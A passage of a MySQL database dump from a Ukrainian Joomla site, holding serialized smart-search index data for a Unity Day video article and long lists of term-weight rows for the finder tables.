width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"134\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2023-01-22 09:43:22\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:10:\"Відео\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:31:\"2546:z-dnem-sobornosti-ukrajini\";s:7:\"catslug\";s:9:\"134:video\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:38:\"/video/2546-z-dnem-sobornosti-ukrajini\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:10:\"Відео\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Відео\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2546\";s:5:\"route\";s:86:\"index.php?option=com_content&view=article&id=2546:z-dnem-sobornosti-ukrajini&catid=134\";s:5:\"title\";s:48:\"З Днем Соборності України!\";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2023-01-22 09:43:22\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2023-01-22 09:43:22\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}');
/*!40000 ALTER TABLE `fw3gt_finder_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms0`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms0`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms0` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms0`
--

LOCK TABLES `fw3gt_finder_links_terms0` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms0` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms0` VALUES (4953,1523606,0.39996),(4954,1523606,0.39996),(4955,1523606,0.39996),(4956,1523606,0.39996),(4957,1523606,0.39996),(4569,1523606,0.39996),(4571,1523606,0.39996),(4572,1523606,0.39996),(4574,1523606,0.39996),(4585,1523606,0.39996),(4593,1523606,0.39996),(4594,1523606,0.39996),(4604,1523606,0.39996),(4608,1523606,0.39996),(4614,1523606,0.39996),(4616,1523606,0.39996),(4617,1523606,0.39996),(4624,1523606,0.39996),(4625,1523606,0.39996),(4626,1523606,0.39996),(4635,1523606,0.39996),(4653,1523606,0.39996),(4658,1523606,0.39996),(4661,1523606,0.39996),(4664,1523606,0.39996),(4669,1523606,0.39996),(4672,1523606,0.39996),(4673,1523606,0.39996),(4678,1523606,0.39996),(4687,1523606,0.39996),(4693,1523606,0.39996),(4710,1523606,0.39996),(4721,1523606,0.39996),(4723,1523606,0.39996),(4727,1523606,0.39996),(4732,1523606,0.39996),(4734,1523606,0.39996),(4735,1523606,0.39996),(4736,1523606,0.39996),(4741,1523606,0.39996),(4749,1523606,0.39996),(4753,1523606,0.39996),(4759,1523606,0.39996),(4761,1523606,0.39996),(4762,1523606,0.39996),(4764,1523606,0.39996),(4767,1523606,0.39996),(4770,1523606,0.39996),(4773,1523606,0.39996),(4776,1523606,0.39996),(4777,1523606,0.39996),(4778,1523606,0.39996),(4780,1523606,0.39996),(4798,1523606,0.39996),(4799,1523606,0.39996),(4803,1523606,0.39996),(4804,1523606,0.39996),(4806,1523606,0.39996),(4808,1523606,0.39996),(4809,1523606,0.39996),(4813,1523606,0.39996),(4814,1523606,0.39996),(4837,1523606,0.39996),(4839,1523606,0.39996),(4847,1523606,0.39996),(4849,1523606,0.39996),(4850,1523606,0.39996),(4851,1523606,0.39996),(4852,1523606,0.39996),(4857,1523606,0.39996),(4909,1523606,0.39996),(4917,1523606,0.39996),(4918,1523606,0.39996),(4924,1523606,0.39996),(4927,1523606,0.39996),(4928,1523606,0.39996),(4929,1523606,0.39996),(4930,1523606,0.39996),(4931,1523606,0.39996),(4934,1523606,0.39996),(4935,1523606,0.39996),(4938,1523606,0.39996),(4940,1523606,0.39996),(4945,1523606,0.39996),(4947,1523606,0.39996),(4948,1523606,0.39996),(4949,1523606,0.39996),(4951,1523606,0.39996),(4569,1523607,1.59996),(4571,1523607,1.59996),(4572,1523607,1.59996),(4574,1523607,1.59996),(4585,1523607,1.59996),(4593,1523607,1.59996),(4594,1523607,1.59996),(4604,1523607,1.59996),(4608,1523607,1.59996),(4614,1523607,1.59996),(4616,1523607,1.59996),(4617,1523607,1.59996),(4624,1523607,1.59996),(4625,1523607,1.59996),(4626,1523607,1.59996),(4635,1523607,1.59996),(4653,1523607,1.59996),(4658,1523607,1.59996),(4661,1523607,1.59996),(4664,1523607,1.59996),(4669,1523607,1.59996),(4672,1523607,1.59996),(4673,1523607,1.59996),(4678,1523607,1.59996),(4687,1523607,1.59996),(4693,1523607,1.59996),(4710,1523607,1.59996),(4721,1523607,1.59996),(4723,1523607,1.59996),(4727,1523607,1.59996),(4732,1523607,1.59996),(4734,1523607,1.59996),(4735,1523607,1.59996),(4736,1523607,1.59996),(4741,1523607,1.59996),(4749,1523607,1.59996),(4753,1523607,1.59996),(4759,1523607,1.59996),(4761,1523607,1.59996),(4762,1523607,1.59996),(4764,1523607,1.59996),(4767,1523607,1.59996),(4770,1523607,1.59996),(4773,1523607,1.59996),(4776,1523607,1.59996),(4777,1523607,1.59996),(4778,1523607,1.59996),(4780,1523607,1.59996),(4798,1523607,1.59996),(4799,1523607,1.59996),(4803,1523607,1.59996),(4804,1523607,1.59996),(4806,1523607,1.59996),(4808,1523607,1.59996),(4809,1523607,1.59996),(4813,1523607,1.59996),(4814,1523607,1.59996),(4837,1523607,1.59996),(4839,1523607,1.59996),(4847,1523607,1.59996),(4849,1523607,1.59996),(4850,1523607,1.59996),(4851,1523607,1.59996),(4852,1523607,1.59996),(4857,1523607,1.59996),(4909,1523607,1.59996),(4917,1523607,1.59996),(4918,1523607,1.59996),(4924,1523607,1.59996),(4927,1523607,1.59996),(4928,1523607,1.59996),(4929,1523607,1.59996),(4930,1523607,1.59996),(4931,1523607,1.59996),(4934,1523607,1.59996),(4935,1523607,1.59996),(4938,1523607,1.59996),(4940,1523607,1.59996),(4945,1523607,1.59996),(4947,1523607,1.59996),(4948,1523607,1.59996),(4949,1523607,1.59996),(4951,1523607,1.59996),(4953,1523607,1.59996),(4954,1523607,1.59996),(4955,1523607,1.59996),(4956,1523607,1.59996),(4957,1523607,1.59996),(4723,1523660,0.79339),(4764,1523660,0.79339),(4850,1523660,0.79339),(4928,1523660,0.79339),(4951,1523660,0.79339),(4723,1523661,2.60661),(4764,1523661,2.60661),(4850,1523661,2.60661),(4928,1523661,2.60661),(4951,1523661,2.60661),(4723,1523662,2.89),(4764,1523662,2.89),(4552,1523930,1.7334),(4755,1523930,1.7334),(4552,1523931,3.2666),(4552,1523936,0.6666),(4569,1524842,0.68),(4569,1524843,2.55),(4572,1525017,0.6666),(4661,1525017,0.6666),(4572,1525018,2.8666),(4572,1525034,1.24661),(4572,1525035,2.66339),(4572,1525036,3.11661),(4593,1527370,0.8),(4593,1527371,3.2),(4593,1527372,3.4),(4594,1527503,0.6666),(4594,1527662,0.46669),(4594,1527663,0.98),(4594,1527664,1.19),(4604,1535944,0.65331),(4604,1535945,1.12),(4604,1535946,1.16669),(4604,1535998,0.46669),(4626,1535998,0.46669),(4604,1535999,1.02669),(4626,1535999,1.02669),(4604,1536000,1.37669),(4604,1536001,0.42),(4604,1536002,1.00331),(4604,1536003,1.21331),(4626,1536004,0.42),(4624,1536004,0.98),(4604,1536004,2.1),(4604,1536005,0.81669),(4604,1536006,0.93331),(4604,1536007,1.02669),(4604,1536008,1.30669),(4604,1536009,2.1),(4604,1536010,1.28331),(4604,1536011,1.14331),(4604,1536012,1.02669),(4604,1536013,1.12),(4604,1536014,1.12),(4604,1536015,1.21331),(4604,1536016,2.19338),(4604,1536017,2.38),(4604,1536018,0.93331),(4604,1536019,1.16669),(4604,1536020,1.00331),(4604,1536021,1.26),(4604,1536022,1.07331),(4604,1536023,1.33),(4604,1536024,0.98),(4604,1536025,1.21331),(4604,1536026,0.93331),(4604,1536027,1.02669),(4604,1536028,0.98),(4604,1536029,1.07331),(4604,1536030,0.98),(4604,1536031,1.21331),(4626,1536032,0.65331),(4604,1536032,1.30662),(4604,1536033,2.24),(4604,1536034,2.8),(4626,1536035,0.60669),(4604,1536035,1.21338),(4604,1536036,2.19338),(4604,1536037,1.4),(4604,1536038,1.30669),(4604,1536447,0.46669),(4626,1536447,0.46669),(4604,1536448,1.00331),(4626,1536448,1.00331),(4604,1536449,1.4),(4604,1536450,0.42),(4626,1536450,2.1),(4604,1536451,0.98),(4626,1536451,4.9),(4604,1536452,1.07331),(4614,1547095,0.14),(4625,1547095,0.14),(4721,1547095,0.14),(4734,1547095,0.28),(4614,1547096,1.02669),(4614,1547097,1.28331),(4614,1547098,0.09331),(4734,1547098,0.18662),(4917,1547098,0.18662),(4614,1547099,0.79331),(4614,1547100,0.95669),(4614,1547101,0.18669),(4625,1547101,0.18669),(4614,1547102,1.05),(4614,1547103,1.30669),(4616,1547709,2),(4616,1547710,3.6666),(4616,1547711,4),(4616,1547744,1.3334),(4616,1547745,3.6),(4616,1547746,0.60669),(4616,1547747,1.28331),(4616,1547748,1.4),(4616,1548042,0.28),(4616,1548043,1.02669),(4616,1548044,1.26),(4617,1548482,0.23331),(4626,1548482,0.23331),(4625,1548482,0.46662),(4927,1548482,1.26654),(4617,1548483,0.91),(4625,1548483,0.91),(4617,1548484,1.07331),(4625,1548484,1.07331),(4624,1553961,0.09331),(4624,1553962,0.79331),(4624,1553963,0.84),(4624,1553964,1.05),(4624,1553965,1.26),(4624,1553966,1.05),(4624,1553967,1.14331),(4624,1553968,1.05),(4624,1553969,1.14331),(4624,1553970,1.21331),(4624,1553971,1.30669),(4624,1553972,1.02669),(4624,1553973,1.12),(4624,1553974,1.00331),(4624,1553975,1.4),(4624,1553976,1.02669),(4624,1553977,1.21331),(4624,1554470,0.14),(4624,1554471,0.84),(4624,1554472,0.98),(4624,1554473,0.14),(4624,1554474,0.91),(4624,1554475,0.95669),(4624,1554476,0.7),(4624,1554477,1.12),(4624,1554478,1.4),(4624,1554479,0.7),(4624,1554480,1.09669),(4624,1554481,1.4),(4625,1555443,1.00331),(4625,1555444,1.16669),(4625,1555445,0.91),(4625,1555446,1.02669),(4625,1555447,1.07331),(4625,1555448,1.28331),(4626,1555982,0.46669),(4626,1555983,1.14331),(4626,1555984,1.30669),(4626,1555985,1.3334),(4626,1555986,2.9334),(4626,1555987,3.0666),(4626,1555988,0.28),(4626,1555989,1.16669),(4626,1555990,1.4),(4626,1556025,1.21331),(4626,1556026,0.37331),(4626,1556027,1.05),(4626,1556028,1.30669),(4626,1556029,0.28),(4626,1556030,1.09669),(4626,1556031,1.19),(4626,1556032,0.95669),(4626,1556033,1.05),(4626,1556034,1.05),(4626,1556035,1.30669),(4626,1556036,0.91),(4626,1556037,1.23669),(4626,1556038,1.19),(4626,1556039,1.4),(4626,1556040,1.30669),(4626,1556041,1.37669),(4626,1556870,0.37331),(4917,1556870,0.37331),(4927,1556870,0.37331),(4626,1556871,0.93331),(4626,1556872,1.07331),(4626,1556873,0.88669),(4626,1556874,0.98),(4626,1556875,0.23331),(4849,1556875,0.23331),(4927,1556875,0.23331),(4626,1556876,0.86331),(4626,1556877,1.09669),(4626,1556878,1.26),(4626,1556879,6.18345),(4653,1560603,1.6),(4762,1560603,1.6),(4653,1560604,3.1334),(4762,1560604,3.1334),(4653,1560605,3.3334),(4653,1560606,1.0666),(4653,1560607,3.4),(4653,1560608,3.7334),(4653,1560609,0.9334),(4653,1560610,2.6666),(4653,1560611,3.1334),(4658,1563140,0.46669),(4658,1563141,1.00331),(4658,1563142,1.35331),(4777,1564188,0.6666),(4940,1564188,1.3332),(4693,1569264,2),(4693,1569265,4),(4693,1569266,4),(4693,1569267,0.89991),(4693,1569268,3.4),(4693,1569269,4),(4693,1569270,0.98),(4693,1569271,1.07331),(4693,1569272,0.14),(4693,1569273,0.88669),(4693,1569274,1.14331),(4693,1569390,0.51331),(4693,1569391,1.19),(4693,1569392,1.23669),(4710,1585168,0.18669),(4721,1585168,0.18669),(4710,1592745,0.23331),(4710,1592746,0.93331),(4710,1592747,1.14331),(4710,1592748,1.02669),(4710,1592749,1.07331),(4710,1592750,0.28),(4710,1592751,1.07331),(4710,1592752,1.28331),(4710,1592753,0.42),(4710,1592754,1.05),(4710,1592755,1.28331),(4721,1602916,0.8),(4721,1602917,2.9334),(4721,1602918,3.7334),(4721,1604057,0.91),(4721,1604058,1.00331),(4721,1604059,1.00331),(4721,1604060,1.26),(4940,1604061,0.23331),(4721,1604061,0.46662),(4721,1604062,1.05),(4721,1604063,1.37669),(4721,1604064,1.07331),(4721,1604065,1.26),(4721,1604066,0.28),(4721,1604067,0.98),(4721,1604068,1.19),(4721,1604069,0.23331),(4721,1604070,1.00331),(4721,1604071,1.23669),(4721,1604072,0.93324),(4721,1604073,0.88669),(4721,1604074,1.12),(4721,1604075,0.95669),(4721,1604076,1.12),(4721,1604077,0.95669),(4721,1604078,1.12),(4721,1604079,1.00331),(4721,1604080,1.05),(4721,1604081,0.28),(4777,1604081,0.28),(4721,1604082,0.95669),(4721,1604083,1.02669),(4727,1605061,1.0666),(4727,1605062,3.2),(4732,1613366,0.8),(4732,1613367,3.1334),(4732,1613368,3.2666),(4732,1613672,0.28),(4732,1613673,0.98),(4732,1613674,1.21331),(4734,1615841,0.1334),(4734,1615842,2.8666),(4734,1615843,3.1334),(4734,1615877,0.8),(4734,1615878,2.8),(4734,1615879,2.9334),(4734,1617660,1.05),(4734,1617661,1.09669),(4734,1617662,1.00331),(4734,1617663,1.05),(4734,1617664,0.28),(4734,1617665,0.91),(4734,1617666,0.98),(4734,1617667,0.23331),(4734,1617668,0.93331),(4734,1617669,1.21331),(4734,1617670,0.81669),(4734,1617671,0.98),(4734,1617672,1.05),(4734,1617673,1.16669),(4734,1617674,0.18669),(4734,1617675,1.00331),(4734,1617676,1.21331),(4734,1617677,0.28),(4734,1617678,1.05),(4734,1617679,1.14331),(4735,1617917,0.9334),(4735,1617918,3.2),(4735,1617919,4),(4735,1617920,0.5334),(4735,1617921,2.6666),(4735,1617922,2.8666),(4761,1627439,1.8669),(4761,1627440,10.5),(4761,1627441,12.1331),(4762,1628675,1.86676),(4762,1628676,4.48),(4762,1628677,4.94676),(4762,1628678,0.51331),(4762,1628679,1.09669),(4762,1628680,1.4),(4762,1628681,1.24661),(4762,1628682,2.83339),(4762,1628683,3.11661),(4762,1628684,2.61317),(4762,1628685,8.00317),(4762,1628686,8.65683),(4764,1629038,0.9334),(4764,1629039,3.2),(4764,1629040,3.9334),(4773,1629276,1.0666),(4814,1629276,1.0666),(4931,1629276,2.1332),(4954,1629276,2.1332),(4773,1629277,2.6666),(4773,1629278,3.1334),(4776,1629336,0.6666),(4777,1629336,0.6666),(4777,1629361,2.8666),(4777,1629362,3.2),(4777,1629363,0.6666),(4777,1629364,2.5334),(4777,1629365,2.9334),(4777,1629366,2.8),(4777,1629797,0.28),(4777,1629798,1.05),(4777,1629799,1.14331),(4777,1629800,0.32669),(4777,1629801,1.00331),(4777,1629802,1.23669),(4777,1629803,0.98),(4777,1629804,1.12),(4780,1629948,0.8),(4780,1629949,2.7334),(4780,1629950,3.0666),(4798,1643801,0.18669),(4798,1643802,1.05),(4798,1643803,1.37669),(4803,1644924,0.8),(4803,1644925,2.8),(4803,1644926,3.0666),(4803,1645130,0.45339),(4803,1645131,2.09661),(4803,1645132,2.49339),(4809,1645387,0.9334),(4809,1645388,2.8666),(4809,1645389,3.2666),(4813,1645517,0.6666),(4813,1645518,2.5334),(4813,1645519,2.8666),(4814,1645594,1.4666),(4814,1645595,3.3334),(4847,1646859,2.1332),(4847,1646860,6.1332),(4849,1646948,1.0668),(4849,1647420,0.23331),(4849,1647421,0.88669),(4849,1647422,1.02669),(4849,1647423,0.28),(4849,1647424,0.98),(4849,1647425,1.12),(4849,1647426,0.28),(4849,1647427,1.00331),(4849,1647428,1.12),(4849,1647429,1.00331),(4849,1647430,1.12),(4850,1647961,2.83339),(4928,1647961,2.83339),(4951,1647961,2.83339),(4852,1648045,2.6668),(4852,1648046,6.5332),(4852,1648047,7.7332),(4909,1672190,1.8668),(4909,1672191,5.3332),(4909,1672192,6.6668),(4909,1672474,1.60008),(4909,1672475,1.09669),(4909,1672476,1.28331),(4909,1672477,2.94661),(4909,1672478,0.32669),(4909,1672479,1.12),(4909,1672480,1.23669),(4917,1679343,0.18669),(4917,1679344,1.09669),(4917,1679345,1.30669),(4917,1679346,1.05),(4917,1679347,1.26),(4917,1679348,0.88669),(4917,1679349,1.07331),(4917,1679350,1.05),(4917,1679351,1.09669),(4917,1679352,1.11993),(4917,1679353,1.86662),(4917,1679354,1.96),(4917,1679355,1.02669),(4917,1679356,1.09669),(4917,1679357,0.23331),(4917,1679358,1.16669),(4917,1679359,1.35331),(4917,1679360,1.30662),(4917,1679361,2.56662),(4917,1679362,1.4),(4917,1679363,1.4),(4917,1679364,2.48),(4917,1679365,1.19),(4917,1679366,1.28331),(4917,1679367,1.07331),(4917,1679368,1.28331),(4924,1680526,1.3332),(4924,1680527,6),(4924,1680528,6.9332),(4924,1680529,0.8),(4924,1680530,4.6668),(4924,1680531,5.4668),(4924,1680532,1.3332),(4924,1680533,6.1332),(4924,1680534,6.9332),(4924,1680550,2.6668),(4924,1680551,6.1332),(4924,1680552,2.4),(4924,1680553,6.1332),(4924,1680554,6.6668),(4927,1683236,1.16669),(4927,1683237,1.33),(4927,1683238,3.28008),(4927,1683239,1.19),(4927,1683240,0.95669),(4927,1683241,1.09669),(4927,1683242,1.07331),(4927,1683243,1.23669),(4927,1683244,0.95669),(4927,1683245,1.26),(4930,1683787,2.4),(4931,1683818,6.5332),(4931,1683819,7.6),(4938,1686586,0.37331),(4938,1686587,1.09669),(4938,1686588,1.4),(4940,1688200,5.6),(4940,1688201,6.8),(4940,1688202,0.28),(4940,1688203,0.91),(4940,1688204,1.07331),(4940,1688205,2.1332),(4940,1688206,5.4668),(4940,1688207,6.2668),(4940,1688695,1.19),(4940,1688696,1.4),(4940,1688697,0.23331),(4940,1688698,1.12),(4940,1688699,1.28331),(4945,1689247,1.6),(4945,1689248,3.2),(4945,1689249,7.2),(4945,1689250,8),(4947,1689270,0.6666),(4948,1689270,0.6666),(4946,1689270,1.3332),(4949,1689270,1.9998),(4947,1689271,2.9334),(4948,1689271,2.9334),(4949,1689271,2.9334),(4946,1689271,5.8668),(4947,1689285,3.2666),(4947,1689286,1.3332),(4948,1689316,3.2666),(4949,1689347,3.2666),(4957,1689517,2.6668),(4957,1689518,6.5332);
/*!40000 ALTER TABLE `fw3gt_finder_links_terms0` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fw3gt_finder_links_terms1`
--

DROP TABLE IF EXISTS `fw3gt_finder_links_terms1`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `fw3gt_finder_links_terms1` (
  `link_id` int(10) unsigned NOT NULL,
  `term_id` int(10) unsigned NOT NULL,
  `weight` float unsigned NOT NULL,
  PRIMARY KEY (`link_id`,`term_id`),
  KEY `idx_term_weight` (`term_id`,`weight`),
  KEY `idx_link_term_weight` (`link_id`,`term_id`,`weight`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fw3gt_finder_links_terms1`
--

LOCK TABLES `fw3gt_finder_links_terms1` WRITE;
/*!40000 ALTER TABLE `fw3gt_finder_links_terms1` DISABLE KEYS */;
INSERT INTO `fw3gt_finder_links_terms1` VALUES (4552,1523929,0.34),(4552,1523947,0.23331),(4552,1523948,1.16669),(4552,1523949,1.23669),(4593,1527394,0.56661),(4593,1527395,2.66339),(4593,1527396,3.11661),(4594,1527573,0.28),(4594,1527574,0.95669),(4594,1527575,1.14331),(4604,1535941,0.14),(4604,1535942,0.81669),(4604,1535943,1.05),(4604,1536220,0.04669),(4614,1536220,0.04669),(4624,1536220,0.09338),(4616,1536220,0.14007),(4626,1536220,0.28014),(4604,1536221,0.84),(4616,1536221,2.52),(4604,1536222,1.02669),(4604,1536223,0.42),(4614,1536223,0.42),(4625,1536223,0.42),(4616,1536223,0.84),(4617,1536223,0.84),(4635,1536223,1.02),(4604,1536224,0.95669),(4604,1536225,1.14331),(4604,1536226,0.32669),(4604,1536227,1.09669),(4604,1536228,1.4),(4604,1536229,0.32669),(4604,1536230,1.05),(4604,1536231,1.35331),(4608,1540337,0.42),(4608,1540338,1.05),(4608,1540339,1.23669),(4608,1540340,0.56),(4608,1540341,1.14331),(4608,1540342,1.21331),(4608,1540343,0.28),(4625,1540343,0.28),(4608,1540344,1.07331),(4608,1540345,1.33),(4608,1540346,0.23331),(4608,1540347,1.02669),(4608,1540348,1.09669),(4614,1546219,0.21),(4614,1546220,0.84),(4614,1546221,0.98),(4614,1546222,0.28),(4614,1546223,0.86331),(4614,1546224,1.05),(4614,1546646,0.88669),(4626,1546646,3.54676),(4614,1546647,1.00331),(4626,1546647,4.01324),(4614,1546648,0.23331),(4614,1546649,0.93331),(4614,1546650,1.00331),(4614,1546651,0.51331),(4614,1546652,1.16669),(4614,1546653,1.28331),(4614,1546654,1.28331),(4614,1546655,1.4),(4614,1546656,0.32669),(4614,1546657,1.21331),(4614,1546658,1.4),(4614,1546659,0.32669),(4614,1546660,0.95669),(4614,1546661,1.00331),(4616,1547885,0.91),(4616,1547886,2.1),(4616,1547887,1.00331),(4616,1547888,1.05),(4616,1547889,0.95669),(4617,1547889,0.95669),(4625,1547889,0.95669),(4616,1547890,1.26),(4617,1547890,1.26),(4617,1548340,1.16669),(4617,1548341,1.30669),(4624,1554222,1.86662),(4624,1554223,2.1),(4624,1554224,0.32669),(4624,1554225,1.05),(4624,1554226,1.16669),(4624,1554227,0.37331),(4624,1554228,1.02669),(4624,1554229,1.26),(4624,1554230,0.32669),(4798,1554230,0.32669),(4624,1554231,1.05),(4624,1554232,1.23669),(4624,1554233,0.37331),(4624,1554234,1.07331),(4624,1554235,1.4),(4625,1555128,0.28),(4626,1555128,0.28),(4625,1555129,1.14331),(4626,1555129,1.14331),(4625,1555130,1.35331),(4626,1555130,1.35331),(4625,1555131,1.26),(4625,1555132,0.37331),(4625,1555133,1.23669),(4625,1555134,1.33),(4625,1555135,0.91),(4625,1555136,1.23669),(4625,1555137,0.42),(4625,1555138,1.05),(4625,1555139,1.09669),(4626,1556472,1.82),(4626,1556473,2.05338),(4626,1556474,2.1),(4626,1556475,1.05),(4626,1556476,1